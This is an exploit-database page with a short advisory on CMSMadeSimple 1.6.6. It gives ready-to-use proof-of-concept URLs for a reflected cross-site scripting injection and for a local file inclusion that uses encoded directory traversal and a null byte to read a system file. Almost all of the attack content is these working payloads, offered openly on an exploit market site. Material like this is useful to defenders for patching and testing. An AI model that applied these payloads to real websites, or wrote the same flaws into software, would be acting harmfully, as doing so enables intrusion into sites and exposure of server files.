[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMSMadeSimple v1.6.6 Xss/local file inclusion vulnerabilities

Author
Beenu Arora
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10868
Category
web applications
Date add
12-02-2010
Platform
unsorted
=============================================================
CMSMadeSimple v1.6.6 Xss/local file inclusion vulnerabilities
=============================================================

################################################################ 
# 
# Exploit: Multiple Vulnerablities in cmsmadesimple
# 
# AppSite: http://www.cmsmadesimple.com/
# 
# Tested Version : 1.6.6
# XSS
# 
# POC:-http://localhost/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
# 
#
# 
# Multiple Local File Inclusion
#
# Sample URL: 
# POC:-http://localhost:80/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39
#
#
################################################################ 




#  0day.today [2024-07-02]  #